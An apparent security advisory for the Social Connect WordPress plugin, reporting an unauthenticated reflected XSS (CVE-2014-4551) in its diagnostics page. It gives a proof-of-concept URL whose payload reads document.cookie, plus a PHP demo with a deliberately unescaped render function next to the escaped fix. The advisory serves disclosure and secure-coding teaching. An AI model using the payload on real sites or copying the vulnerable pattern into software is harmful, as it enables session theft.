wp-plugin : social-connect

Plugin Details
Plugin Name : wp-plugin : social-connect
Affected Version : 1.0.4 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/socialconnect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
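As an added illustration for this advisory (constructed, not the plugin's own diagnostics/test.php, whose source is not on this page), the snippet below shows a diagnostics page that reflects the `testing` query parameter the way the PoC relies on, next to the escaping that makes the same reflection inert. The file layout and parameter name are assumptions taken only from the PoC URL.

```php
<?php
// Constructed illustration (not the plugin's real diagnostics/test.php):
// a page that reflects the "testing" query parameter into an attribute.
// Run stand-alone with  php -S 127.0.0.1:8080 -t .  and open
//   /test.php?testing=testing%27%3E%3Cscript%3Ealert(1)%3C/script%3E
// Output is served as text/plain so the markup is shown, never executed.

$testing = isset($_GET['testing']) ? (string) $_GET['testing'] : '';

// Vulnerable pattern: the raw value lands inside a single-quoted attribute.
// The PoC value  testing'><script>...</script>  closes the attribute and the
// tag, so a browser would parse and run the injected <script>.
function render_vulnerable(string $value): string
{
    return "<input type='text' name='testing' value='" . $value . "'>";
}

// Still vulnerable on PHP < 8.1: htmlspecialchars() there defaults to
// ENT_COMPAT, which encodes " < > & but leaves the single quote (%27 in the
// PoC) alone, so the attribute breakout survives. PHP 8.1+ defaults to
// ENT_QUOTES, which is why the fix below names the flag explicitly.
function render_half_fixed(string $value): string
{
    return "<input type='text' name='testing' value='" . htmlspecialchars($value) . "'>";
}

// Fixed: escape for the exact output context. ENT_QUOTES encodes both quote
// characters, so the value can never terminate the attribute. Inside plugin
// code the WordPress equivalents are esc_attr() for attribute values and
// esc_html() for text nodes.
function render_fixed(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='text' name='testing' value='" . $safe . "'>";
}

// A diagnostics script should also not be reachable by anonymous visitors;
// in WordPress that is is_user_logged_in() && current_user_can('manage_options')
// before any output. Omitted here so the demo runs without WordPress.
header('Content-Type: text/plain; charset=UTF-8');
$variants = [
    'vulnerable'               => render_vulnerable($testing),
    'htmlspecialchars default' => render_half_fixed($testing),
    'ENT_QUOTES (fixed)'       => render_fixed($testing),
];
foreach ($variants as $label => $html) {
    echo str_pad($label . ':', 27) . $html . "\n";
}
```

Compare the three lines in the response: only the last one keeps the PoC value inside the attribute as data.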


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4551
Plugin Description :
Social Connect adds social login buttons on the login, register and comment forms of your WordPress site. The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account. It makes it super easy for new members to register with your site and existing members to login.

= Props =
Special thanks to:
* [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums;
* [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums;
* [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and
* [Wirone](http://blog.wirone.info/) for Polish translation and patches.
And everyone else in the forums sharing the fixes they find and answering each other's questions.

= Contribute =
Social Connect is rapidly growing in popularity and help with the growing pains is appreciated. If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect). Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform).